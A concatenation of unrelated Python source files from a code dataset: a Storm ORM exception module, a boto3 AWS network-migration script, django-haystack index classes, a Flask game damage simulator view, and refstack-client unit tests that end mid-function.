# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
class StormError(Exception):
pass
class CompileError(StormError):
pass
class NoTableError(CompileError):
pass
class ExprError(StormError):
pass
class NoneError(StormError):
pass
class PropertyPathError(StormError):
pass
class ClassInfoError(StormError):
pass
class URIError(StormError):
pass
class ClosedError(StormError):
pass
class FeatureError(StormError):
pass
class DatabaseModuleError(StormError):
pass
class StoreError(StormError):
pass
class NoStoreError(StormError):
pass
class WrongStoreError(StoreError):
pass
class NotFlushedError(StoreError):
pass
class OrderLoopError(StoreError):
pass
class NotOneError(StoreError):
pass
class UnorderedError(StoreError):
pass
class LostObjectError(StoreError):
pass
class Error(StormError):
pass
class Warning(StormError):
pass
class InterfaceError(Error):
pass
class DatabaseError(Error):
pass
class InternalError(DatabaseError):
pass
class OperationalError(DatabaseError):
pass
class ProgrammingError(DatabaseError):
pass
class IntegrityError(DatabaseError):
pass
class DataError(DatabaseError):
pass
class NotSupportedError(DatabaseError):
pass
class DisconnectionError(OperationalError):
pass
class TimeoutError(StormError):
"""Raised by timeout tracers when remining time is over."""
def __init__(self, statement, params, message=None):
self.statement = statement
self.params = params
self.message = message
def __str__(self):
return ', '.join(
[repr(element) for element in
(self.message, self.statement, self.params)
if element is not None])
class ConnectionBlockedError(StormError):
"""Raised when an attempt is made to use a blocked connection."""
def install_exceptions(module):
for exception in (Error, Warning, DatabaseError, InternalError,
OperationalError, ProgrammingError, IntegrityError,
DataError, NotSupportedError, InterfaceError):
module_exception = getattr(module, exception.__name__, None)
if module_exception is not None:
module_exception.__bases__ += (exception,)
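# --- Added sketch (not part of the original module) ---
# install_exceptions() grafts the classes above onto a DB-API driver's exception
# hierarchy, so the driver's own IntegrityError can also be caught as this
# module's IntegrityError. The fake driver module below is an assumption made
# purely for illustration; real callers would pass a module such as sqlite3.
if __name__ == "__main__":
    import types
    fake_driver = types.ModuleType("fake_driver")
    class FakeError(Exception):
        pass
    class FakeIntegrityError(FakeError):
        pass
    fake_driver.IntegrityError = FakeIntegrityError
    install_exceptions(fake_driver)
    print(issubclass(fake_driver.IntegrityError, IntegrityError))  # True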
|
StarcoderdataPython
|
4932778
|
#!/usr/bin/python
# -*- coding: utf8 -*-
import boto3
from botocore.exceptions import ClientError
import json
import sys
from utils import *
target_region_name='cn-northwest-1'
# Records the ID mapping from source resources to target resources, e.g. subnet_id, sg_id
transform_map = {
'region': { 'from':'cn-north-1', 'to':'cn-northwest-1'},
'vpc':{},
'subnet':{},
'security_group':{}
}
session = boto3.Session(profile_name=sys.argv[1])
client = session.client('ec2', region_name=transform_map['region']['to'])
ec2 = session.resource('ec2', region_name=target_region_name)
'''
settings2=json.load(open("vpcs_subnets.json"))
settings3=json.load(open("sg_groups.json"))
vpcdict={}
for v in settings1['Vpcs']:
vpcdict[v['VpcId']]=client.create_vpc(CidrBlock=v['CidrBlock'])['Vpc']['VpcId']
vpc = ec2.Vpc(vpcdict[v['VpcId']])
if 'Tags' in v:
vpc.create_tags(Tags=v['Tags'])
vpc.load()
subnetdict={}
for n in settings2['Subnets']:
subnetdict[n['SubnetId']]=client.create_subnet(AvailabilityZone=n['AvailabilityZone'].replace('north','northwest'),CidrBlock=n['CidrBlock'],VpcId=vpcdict[n['VpcId']])['Subnet']['SubnetId']
subnet = ec2.Subnet(subnetdict[n['SubnetId']])
if 'Tags' in n:
subnet.create_tags(Tags=n['Tags'])
subnet.load()
groupdict={}
for s in settings3['SecurityGroups']:
if not (s['GroupName'] == 'default' or s['GroupName'].startswith('launch-wizard')):
if s['VpcId'] in vpcdict:
groupdict[s['GroupId']]=client.create_security_group(Description=s['Description'],GroupName=s['GroupName'],VpcId=vpcdict[s['VpcId']])['GroupId']
security_group = ec2.SecurityGroup(groupdict[s['GroupId']])
security_group.authorize_ingress(IpPermissions=s['IpPermissions'])
FPermissions=[]
for q in s['IpPermissionsEgress']:
if not (q['IpProtocol']=='-1'):
FPermissions.append(q)
if not len(FPermissions)==0:
security_group.authorize_egress(IpPermissions=FPermissions)
if 'Tags' in s:
security_group.create_tags(Tags=s['Tags'])
security_group.load()
settings4=json.load(open("ec2_list.json"))
amilist=json.load(open("ami.json"))
newlist=[]
for i in amilist:
newlist.append({'ImageId':client.copy_image(Name=i['ImageName'],SourceImageId=i['ImageId'],SourceRegion='cn-north-1')['ImageId'],'ImageName':i['ImageName']})
imagedict={}
for i in newlist:
imagedict[i['ImageName']]=i['ImageId']
for i in settings4['Reservations']:
for ii in i['Instances']:
for iii in ii['SecurityGroups']:
SGIds=[]
if iii['GroupId'] in groupdict:
SGIds.append(groupdict[iii['GroupId']])
if not len(SGIds)==0:
ec2.create_instances(MaxCount=1,MinCount=1,ImageId=imagedict[ii['InstanceId']],InstanceType=ii['InstanceType'],SecurityGroupIds=SGIds,SubnetId=subnetdict[ii['SubnetId']],PrivateIpAddress=ii['PrivateIpAddress'])
'''
def print_tags(tag_list):
tag_str='Tags( '
for tag in tag_list:
tag_str += '{key}/{value} '.format(key=tag['Key'], value=tag['Value'])
tag_str += ')'
return tag_str
def import_vpcs():
vpcs=json.load(open("vpcs_export.json"))
for vpc in vpcs['Vpcs']:
if 'Tags' not in vpc:
vpc['Tags'] = [
{
'Key': 'Name',
'Value': ''
}
]
print('{cidr} {tags} IsDefault({IsDefault})'.format(cidr=vpc['CidrBlock'], tags=print_tags(vpc['Tags']), IsDefault=vpc['IsDefault']))
def import_subnets():
subnets = load_json_from_file('vpcs_subnets.json')
for subnet in subnets['Subnets']:
if 'Tags' not in subnet:
subnet['Tags'] = [
{
'Key': 'Name',
'Value': ''
}
]
print('{az} {cidr} {tags})'.format(az=subnet['AvailabilityZone'], cidr=subnet['CidrBlock'], tags=print_tags(subnet['Tags'])))
if subnet['VpcId'] not in transform_map['vpc'].keys():
continue
response = client.create_subnet(
AvailabilityZone=subnet['AvailabilityZone'].replace(transform_map['region']['from'], transform_map['region']['to']),
CidrBlock=subnet['CidrBlock'],
VpcId=transform_map['vpc'][subnet['VpcId']],
DryRun=False
)
#print(response)
# Adding tags
dst_subnet_id = response['Subnet']['SubnetId']
new_subnet = ec2.Subnet(dst_subnet_id)
tag = new_subnet.create_tags(
Tags=subnet['Tags']
)
transform_map['subnet'][subnet['SubnetId']] = dst_subnet_id
write_json_to_file('transform.json', transform_map)
#print(tag)
def tranform_IpPermissions(permissions):
transformed_list=[]
for permission in permissions:
group_list=[]
if 'UserIdGroupPairs' in permission:
for group in permission['UserIdGroupPairs']:
                print(group)
                print(transform_map['security_group'][group['GroupId']])
group_list.append({
'GroupId': transform_map['security_group'][group['GroupId']],
'UserId': transform_map['account']['to']
}
)
permission['UserIdGroupPairs']=group_list
transformed_list.append(permission)
    print(transformed_list)
return transformed_list
def import_sg(Type='Group'):
sg_groups = load_json_from_file('sg_groups.json')
for sg_group in sg_groups['SecurityGroups']:
if sg_group['VpcId'] not in transform_map['vpc'].keys():
continue
if sg_group['GroupName'] == 'default':
continue
if Type == 'Group':
response = client.create_security_group(
Description=sg_group['Description'],
GroupName=sg_group['GroupName'],
VpcId=transform_map['vpc'][sg_group['VpcId']]
)
print(response)
sg_id = response['GroupId']
transform_map['security_group'][sg_group['GroupId']] = sg_id
print(sg_id)
# Adding tags
security_group = ec2.SecurityGroup(sg_id)
if 'Tags' in sg_group:
tag = security_group.create_tags(
Tags=sg_group['Tags']
)
print(tag)
elif Type == 'Rule':
# Adding Ingress/Egress rules
# TODO: Src ... sg mapping
security_group = ec2.SecurityGroup(transform_map['security_group'][sg_group['GroupId']])
response = security_group.authorize_ingress(
IpPermissions=tranform_IpPermissions(sg_group['IpPermissions'])
)
## TODO: Skip just here, later will clear the egress
#response = security_group.authorize_egress(
#IpPermissions=sg_group['IpPermissionsEgress']
#)
write_json_to_file('transform.json', transform_map)
if __name__ == '__main__':
transform_map = load_json_from_file('transform.json')
import_vpcs()
import_subnets()
import_sg(Type='Group')
import_sg(Type='Rule')
write_json_to_file('transform.json', transform_map)
|
StarcoderdataPython
|
11222304
|
<gh_stars>0
from haystack import indexes
from library.models import Item, CaseBrief, SynthesisItem, Synthesis, CollectionTag
name_boost = 1.25
class LibraryCommonIndexPropertiesMixin(object):
belongs_to = indexes.CharField()
# class ItemIndex(indexes.SearchIndex): # this would disable indexing for this index class.
class ItemIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Item Index - I originally hoped this would be a NON-indexed Index class which is then subclassed into
apps' index classes and made indexable there so facilitate restricting to app-level access. Not sure what the
future holds for that concept though.
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
"indexes.Indexable" - tells django-haystack to index that material. Without
it the index is ignored.
Note on assets:
- I think we can leave the secureasset index largely in place - BUT in the index_queryset
method we should restrict the selection to secureassets that are part of Library ie: they have
an entry in ItemAsset relation.
Tags:
http://django-haystack.readthedocs.io/en/v2.4.1/searchindex_api.html#prepare-self-object
'''
def get_model(self):
return Item
'''
Item index document :
'''
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/item_text.txt'
'''
Item Fields
'''
name = indexes.CharField(null=False, model_attr='name', boost=name_boost)
tags = indexes.FacetMultiValueField()
collections = indexes.FacetMultiValueField()
cataloger = indexes.CharField(model_attr='cataloger', null=True)
reviewer = indexes.CharField(model_attr='reviewer', null=True)
prefixed_id = indexes.CharField(model_attr='prefixed_id')
file_names = indexes.FacetMultiValueField()
'''
DublinCore Fields
'''
item_type = indexes.FacetCharField(null=True, model_attr='dublin_core__type')
contributor = indexes.FacetCharField(null=True, model_attr='dublin_core__contributor')
coverage = indexes.FacetCharField(null=True, model_attr='dublin_core__coverage')
creator = indexes.FacetCharField(null=True, model_attr='dublin_core__creator')
date = indexes.FacetDateField(null=True, model_attr='dublin_core__date')
description = indexes.CharField(null=True, model_attr='dublin_core__description')
format = indexes.CharField(null=True, model_attr='dublin_core__format')
identifier = indexes.CharField(null=True, model_attr='dublin_core__identifier')
language = indexes.FacetCharField(null=True, model_attr='dublin_core__language')
publisher = indexes.CharField(null=True, model_attr='dublin_core__publisher')
relation = indexes.CharField(null=True, model_attr='dublin_core__relation')
rights = indexes.CharField(null=True, model_attr='dublin_core__rights')
source = indexes.CharField(null=True, model_attr='dublin_core__source')
subject = indexes.CharField(null=True, model_attr='dublin_core__subject')
'''
Holdings Fields
'''
item_type_comments = indexes.CharField(null=True, model_attr='holdings__item_type_comments')
source_type = indexes.FacetCharField(null=True, model_attr='holdings__source_type')
media_mode = indexes.FacetCharField(null=True, model_attr='holdings__media_mode')
item_internal_location = indexes.CharField(null=True, model_attr='holdings__item_internal_location')
digital_file_name_path = indexes.CharField(null=True, model_attr='holdings__digital_file_name_path')
digital_file_name = indexes.CharField(null=True, model_attr='holdings__digital_file_name')
digital_file_ocrd = indexes.FacetBooleanField(null=True, model_attr='holdings__digital_file_ocrd')
digital_file_type_comments = indexes.CharField(null=True, model_attr='holdings__digital_file_type_comments')
'''
Review Fields
'''
summary = indexes.CharField(null=True, model_attr='review__summary')
people_mentioned = indexes.FacetMultiValueField()
plants = indexes.FacetMultiValueField()
animals = indexes.FacetMultiValueField()
mup_category = indexes.FacetCharField(null=True, model_attr='review__mup_category__name')
use_occupancy_category = indexes.FacetCharField(null=True, model_attr='review__use_occupancy_category__name')
full_text = indexes.FacetCharField(null=True, model_attr='review__full_text')
'''
ResearcherNotes Fields
'''
spreadsheet_id = indexes.FacetIntegerField(null=True, model_attr='researcher_notes__spreadsheet_id')
researcher_notes = indexes.CharField(null=True, model_attr='researcher_notes__researcher_notes')
actions_needed = indexes.CharField(null=True, model_attr='researcher_notes__actions_needed')
search_location = indexes.CharField(null=True, model_attr='researcher_notes__search_location')
search_terms = indexes.FacetCharField(null=True, model_attr='researcher_notes__search_terms')
search_results = indexes.CharField(null=True, model_attr='researcher_notes__search_results')
search_identifier = indexes.FacetCharField(null=True, model_attr='researcher_notes__search_identifier')
cross_reference = indexes.FacetCharField(null=True, model_attr='researcher_notes__cross_reference')
search_summary = indexes.CharField(null=True, model_attr='researcher_notes__search_summary')
def index_queryset(self, using=None):
'''
Get the default QuerySet to index when doing a full update.
Subclasses can override this method to avoid indexing certain objects.
:param using:
:return:
'''
# the super does this:
# self.get_model().objects.all()
qs = super(ItemIndex, self).index_queryset(using=using)
return qs
def prepare_tags(self, obj):
return [tag.name for tag in obj.tags.all()]
def prepare_collections(self, obj):
return [tag.name for tag in obj.collections.all()]
def prepare_file_names(self, obj):
return [file.name for file in obj.files.all()]
def prepare_people_mentioned(self, obj):
if obj.review:
return [tag.name for tag in obj.review.people_mentioned.all()]
else:
return None
def prepare_plants(self, obj):
if obj.review:
return [tag.name for tag in obj.review.plants.all()]
else:
return None
def prepare_animals(self, obj):
if obj.review:
return [tag.name for tag in obj.review.animals.all()]
else:
return None
class CaseBriefIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Case Brief Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
Tags:
http://django-haystack.readthedocs.io/en/v2.4.1/searchindex_api.html#prepare-self-object
'''
def get_model(self):
return CaseBrief
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/casebrief_text.txt'
name = indexes.CharField(null=False, model_attr='story_title', boost=name_boost) # use story title for boosted name field
story_title = indexes.CharField(null=False, model_attr='story_title')
cataloger = indexes.CharField(model_attr='cataloger', null=True)
reviewer = indexes.CharField(model_attr='reviewer', null=True)
prefixed_id = indexes.CharField(model_attr='prefixed_id')
# sources =
source_notes = indexes.CharField()
issues = indexes.CharField()
facts = indexes.CharField()
decision = indexes.CharField()
reasons = indexes.FacetCharField()
notes = indexes.CharField()
tags = indexes.FacetMultiValueField()
keywords = indexes.FacetMultiValueField()
def prepare_tags(self, obj):
return [tag.name for tag in obj.tags.all()]
def prepare_keywords(self, obj):
return [keyword.name for keyword in obj.keywords.all()]
class SynthesisIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Synthesis Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
'''
def get_model(self):
return Synthesis
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/synthesis_text.txt'
prefixed_id = indexes.CharField(model_attr='prefixed_id')
name = indexes.CharField(boost=name_boost)
class SynthesisItemIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Synthesis Item Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
'''
def get_model(self):
return SynthesisItem
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/synthesisitem_text.txt'
subject = indexes.CharField()
overview = indexes.CharField()
# items = indexes.CharField()
# casebriefs = indexes.CharField()
synthesis_category = indexes.CharField(model_attr='category__name', null=True)
class CollectionTagIndex(LibraryCommonIndexPropertiesMixin, indexes.SearchIndex, indexes.Indexable):
'''
Collection Tag Index:
For guidance:
http://django-haystack.readthedocs.io/en/latest/best_practices.html#good-search-needs-good-content
'''
def get_model(self):
return CollectionTag
# Main document index:
text = indexes.CharField(document=True, use_template=True)
document_template_name = 'search/indexes/library/collectiontag_text.txt'
name = indexes.CharField(boost=name_boost)
description = indexes.CharField()
|
StarcoderdataPython
|
5019954
|
<gh_stars>0
from flask import (
Blueprint, flash, g, redirect, render_template, request, url_for
)
from werkzeug.exceptions import abort
from flask import current_app
from .encounter import Encounter
from .encounter_without_mana import Encounter_without_mana
from .buffs_list import Buffs_list
from .character import Character
bp = Blueprint('simulator', __name__)
@bp.route('/')
def index():
return render_template('simulator/index.html')
@bp.route('/formtest', methods=('GET', 'POST'))
def form_test():
intel = request.form['intel']
sp = request.form['sp']
return render_template('simulator/test_form.html', intellect=intel, spellpower=sp)
@bp.route('/simulate', methods=('GET', 'POST'))
def simulate_fight():
# Concernant les checkbox, quand une est decochee le parametre ne sera pas present dans le POST
if request.method == 'POST':
# Character creation from posted arguments
toon = Character(
intel = int(request.form['intel']),
spellpower = int(request.form['spellpower']),
hit_score = int(request.form['spell_hit']),
crit_score = int(request.form['spell_crit']),
haste = int(request.form['spell_haste']),
spirit = int(request.form['spirit']),
trinket1 = request.form['trinket1'],
trinket2 = request.form['trinket2'],
idol = request.form['idol'],
is_csd = 'is_csd' in request.form,
is_spellstrike = 'is_spellstrike' in request.form,
is_spellfire = 'is_spellfire' in request.form)
toon.set_talents(
balance_of_power = "balance_of_power" in request.form,
focused_starlight = "focused_starlight" in request.form,
moonkin_form = "moonkin_form" in request.form,
improved_mf = "improved_mf" in request.form,
starlight_wrath = "starlight_wrath" in request.form,
vengeance = "vengeance" in request.form,
lunar_guidance = "lunar_guidance" in request.form,
moonfury = "moonfury" in request.form,
dreamstate = int(request.form['dreamstate']),
intensity = int(request.form['intensity']),
wrath_of_cenarius = "wrath_of_cenarius" in request.form)
# Buffs from posted arguments
if "is_curse_of_elements" in request.form :
if "is_improved_coe" in request.form :
curse_of_elements = 1.13
else :
curse_of_elements = 1.1
else:
curse_of_elements = 1
# todo :
# is_manapot , is_rune, is_bowis , is_mana_oil, is_manapot, is_rune, is_innervate, is_mana_spring, is_spriest, is_judgment_of_wisdom, is_spirit_scroll
buffs = Buffs_list(
is_motw = 'is_motw' in request.form,
is_totem_of_wrath = "is_totem_of_wrath" in request.form,
is_divine_spirit = "is_divine_spirit" in request.form,
is_arcane_brilliance = "is_arcane_brilliance" in request.form,
is_wrath_of_air = "is_wrath_of_air" in request.form,
is_draenei_in_group = "is_draenei_in_group" in request.form,
curse_of_elements = curse_of_elements,
is_blessing_kings = "is_blessing_kings" in request.form,
is_crusader = "is_crusader" in request.form,
is_sham_4_piece = "is_sham_4_piece" in request.form,
is_flask = "is_flask" in request.form,
is_food = "is_food" in request.form,
is_oil = "is_oil" in request.form,
is_twilight_owl = "is_twilight_owl" in request.form,
is_eye_of_night = "is_eye_of_night" in request.form,
is_T5 = "is_T5" in request.form,
is_T6_2 = "is_T6_2" in request.form,
is_T6_4 = "is_T6_4" in request.form,
is_misery = "is_misery" in request.form,
is_drums = "is_drums" in request.form,
is_lust = "is_lust" in request.form,
lust_count = int(request.form["lust_count"]),
# Mana mana
is_manapot = "is_manapot" in request.form,
is_bowis = "is_bowis" in request.form,
is_mana_oil = "is_mana_oil" in request.form,
is_rune = "is_rune" in request.form,
is_innervate = "is_innervate" in request.form,
is_mana_spring = "is_mana_spring" in request.form,
is_shadow_priest = "is_shadow_priest" in request.form,
is_judgment_of_wisdom = "is_judgment_of_wisdom" in request.form,
shadow_priest_dps = int(request.form["shadow_priest_dps"]),
is_spirit_scroll = "is_spirit_scroll" in request.form)
is_mana_simulated = "is_mana_simulated" in request.form
if is_mana_simulated:
fight = Encounter(toon, buffs, int(request.form['fight_duration']))
computed_fight = fight.compute_dps(int(request.form['loop_count']))
average_dps = computed_fight[0]
logs = computed_fight[1]
else :
fight = Encounter_without_mana(toon, buffs, int(request.form['fight_duration']))
computed_fight = fight.compute_dps(int(request.form['loop_count']))
average_dps = computed_fight[0]
logs = computed_fight[1]
current_app.logger.info('Simulation launched successfully')
current_app.logger.info(str(buffs))
current_app.logger.info("###########################################################################################")
current_app.logger.info(logs)
# return render_template('simulator/simulated.html', dps = average_dps)
return render_template('simulator/index.html',
dps = average_dps,
is_mana_simulated = is_mana_simulated,
toon = toon,
buffs = buffs,
nb_loops = int(request.form['loop_count']),
nb_length = int(request.form['fight_duration']),
trink1 = request.form['trinket1'],
trink2 = request.form['trinket2'],
reqIdol = request.form['idol'],
intensity = int(request.form['intensity']),
dreamstate = int(request.form['dreamstate']),
fight_duration = int(request.form['fight_duration']))
return render_template('simulator/simulated.html')
#def get_simulation_result(id, check_author=True):
# post = get_db().execute(
# 'SELECT p.id, title, body, created, author_id, username'
# ' FROM post p JOIN user u ON p.author_id = u.id'
# ' WHERE p.id = ?',
# (id,)
# ).fetchone()
#
# if post is None:
# abort(404, f"Post id {id} doesn't exist.")
#
# if check_author and post['author_id'] != g.user['id']:
# abort(403)
#
# return render_template('simulator/index.html')
|
StarcoderdataPython
|
1727946
|
<reponame>AbhiyantrikTechnology/DentalHub-Backend<gh_stars>1-10
# import re
# import uuid
# from django.conf import settings
# from django.contrib.auth import authenticate, login as dj_login
# from rest_framework import status
# from rest_framework.views import APIView
# from rest_framework.response import Response
# from rest_framework import permissions
# from userapp.models import User, AppUser
# from userapp.serializers.appuser import AppUserSerializer
# from addressapp.models import Geography
# import logging
# # Get an instance of a logger
# logger = logging.getLogger(__name__)
# class IsPostOrIsAuthenticated(permissions.BasePermission):
# def has_permission(self, request, view):
# if request.method == 'POST':
# return True
# return request.user and request.user.is_authenticated
# class AppUserListView(APIView):
# permission_classes = (IsPostOrIsAuthenticated,)
# serializer_class = AppUserSerializer
# def get(self, request, format=None):
# if request.user.admin:
# user=AppUser.objects.filter(active=True)
# serializer = AppUserSerializer(user, many=True, \
# context={'request': request})
# return Response(serializer.data)
# logger.error("Access is denied.")
# return Response({"message":"Access is denied."},status=400)
# def post(self, request, format=None):
# serializer = AppUserSerializer(data=request.data,\
# context={'request': request})
# if AppUser.objects.filter(username=request.data['username']).exists():
# appuser=AppUser.objects.get(username=request.data['username'])
# user = authenticate(email=appuser.username, password=request.data['password'])
# if user:
# dj_login(request, user)
# return Response({"message":"Login successfull"},status=200)
# logger.error("password do not match")
# return Response({"message":"password do not match"},status=400)
# logger.error("username does not exists.")
# return Response({'message':'username does not exists.'},status=400)
# # logger.error("Access is denied.")
# # return Response({"message":"Access is denied."},status=400)
|
StarcoderdataPython
|
174752
|
#
# Copyright (c) 2014 Piston Cloud Computing, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
import hashlib
import json
import logging
import os
import tempfile
import httmock
import mock
from mock import MagicMock
import unittest
from refstack_client import refstack_client as rc
class TestRefstackClient(unittest.TestCase):
test_path = os.path.dirname(os.path.realpath(__file__))
conf_file_name = '%s/refstack-client.test.conf' % test_path
def patch(self, name, **kwargs):
"""
:param name: Name of class to be patched
:param kwargs: directly passed to mock.patch
:return: mock
"""
patcher = mock.patch(name, **kwargs)
thing = patcher.start()
self.addCleanup(patcher.stop)
return thing
def mock_argv(self, command='test', **kwargs):
"""
Build argv for test.
        :param command: refstack-client sub-command to build argv for
        :param kwargs: optional settings such as conf_file_name, verbose,
            silent, priv_key and test_cases
:return: argv
"""
argv = [command]
if kwargs.get('verbose', None):
argv.append(kwargs.get('verbose', None))
if kwargs.get('silent', None):
argv.append(kwargs.get('silent', None))
argv.extend(['--url', 'http://127.0.0.1', '-y'])
if kwargs.get('priv_key', None):
argv.extend(('-i', kwargs.get('priv_key', None)))
if command == 'test':
argv.extend(
('-c', kwargs.get('conf_file_name', self.conf_file_name)))
if kwargs.get('test_cases', None):
argv.extend(('--', kwargs.get('test_cases', None)))
return argv
def mock_data(self):
"""
Mock the Keystone client methods.
"""
self.mock_identity_service_v2 = {'type': 'identity',
'endpoints': [{'id': 'test-id'}]}
self.mock_identity_service_v3 = {'type': 'identity',
'id': 'test-id'}
self.v2_config = {'auth_url': 'http://0.0.0.0:35357/v2.0/tokens',
'auth_version': 'v2',
'domain_name': 'Default',
'password': '<PASSWORD>',
'tenant_id': 'admin_project_id',
'project_id': 'admin_project_id',
'tenant_name': 'project_name',
'project_name': 'project_name',
'username': 'admin'}
def setUp(self):
"""
Test case setup
"""
logging.disable(logging.CRITICAL)
def test_verbose(self):
"""
Test different verbosity levels.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.INFO)
args = rc.parse_cli_args(self.mock_argv(verbose='-v'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.DEBUG)
args = rc.parse_cli_args(self.mock_argv(verbose='-vv'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.DEBUG)
args = rc.parse_cli_args(self.mock_argv(silent='-s'))
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.assertEqual(client.logger.level, logging.WARNING)
def test_get_next_stream_subunit_output_file(self):
"""
Test getting the subunit file from an existing .testrepository
directory that has a next-stream file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
output_file = client._get_next_stream_subunit_output_file(
self.test_path)
# The next-stream file contains a "1".
        expected_file = self.test_path + "/.testrepository/1"
self.assertEqual(expected_file, output_file)
def test_get_next_stream_subunit_output_file_nonexistent(self):
"""
Test getting the subunit output file from a nonexistent
.testrepository directory.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
output_file = client._get_next_stream_subunit_output_file(
"/tempest/path")
expected_file = "/tempest/path/.testrepository/0"
self.assertEqual(expected_file, output_file)
def test_get_cpid_account_file_not_found(self):
"""
Test that the client will exit if an accounts file is specified,
but does not exist.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/some-file.yaml' % self.test_path)
self.mock_data()
with self.assertRaises(SystemExit):
client._get_keystone_config(client.conf)
def test_get_keystone_config_account_file_empty(self):
"""
Test that the client will exit if an accounts file exists,
but is empty.
"""
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=None)
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/some-file.yaml' % self.test_path)
self.mock_data()
with self.assertRaises(SystemExit):
client._get_keystone_config(client.conf)
def test_get_keystone_config_no_accounts_file(self):
"""
Test that the client will exit if accounts file
is not specified.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
self.mock_data()
with self.assertRaises(SystemExit):
client._get_keystone_config(client.conf)
def test_get_keystone_config(self):
"""
Test that keystone configs properly parsed.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'username': 'admin',
'project_name': 'project_name',
'project_id': 'admin_project_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
actual_result = client._get_keystone_config(client.conf)
expected_result = self.v2_config
self.assertEqual(expected_result, actual_result)
def test_get_cpid_from_keystone_by_tenant_name_from_account_file(self):
"""
Test getting a CPID from Keystone using an admin tenant name
from an accounts file.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
actual_result = client._get_keystone_config(client.conf)
expected_result = None
self.assertEqual(expected_result, actual_result['tenant_id'])
accounts = [
{
'username': 'admin',
'tenant_id': 'tenant_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
actual_result = client._get_keystone_config(client.conf)
self.assertEqual('tenant_id', actual_result['tenant_id'])
def test_generate_keystone_data(self):
"""Test that correct data is generated."""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'username': 'admin',
'tenant_id': 'admin_tenant_id',
'password': '<PASSWORD>'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
configs = client._get_keystone_config(client.conf)
actual_results = client._generate_keystone_data(configs)
expected_results = ('v2', 'http://0.0.0.0:35357/v2.0/tokens',
{'auth':
{'passwordCredentials':
{
'username': 'admin', 'password': '<PASSWORD>'
},
'tenantId': 'admin_tenant_id'}})
self.assertEqual(expected_results, actual_results)
def test_get_cpid_from_keystone_v3_varying_catalogs(self):
"""
Test getting the CPID from keystone API v3 with varying catalogs.
"""
args = rc.parse_cli_args(self.mock_argv())
client = rc.RefstackClient(args)
client.tempest_dir = self.test_path
client._prep_test()
client.conf.set('identity-feature-enabled', 'api_v3', 'true')
client.conf.add_section('auth')
client.conf.set('auth',
'test_accounts_file',
'%s/test-accounts.yaml' % self.test_path)
self.mock_data()
accounts = [
{
'tenant_name': 'tenant_name'
}
]
self.patch(
'refstack_client.refstack_client.read_accounts_yaml',
return_value=accounts)
configs = client._get_keystone_config(client.conf)
auth_version, auth_url, content = \
client._generate_keystone_data(configs)
client._generate_cpid_from_endpoint = MagicMock()
# Test when the identity ID is None.
ks3_ID_None = {'token': {'catalog':
[{'type': 'identity', 'id': None}]}}
@httmock.all_requests
def keystone_api_v3_mock(url, request):
return httmock.response(201, ks3_ID_None)
with httmock.HTTMock(keystone_api_v3_mock):
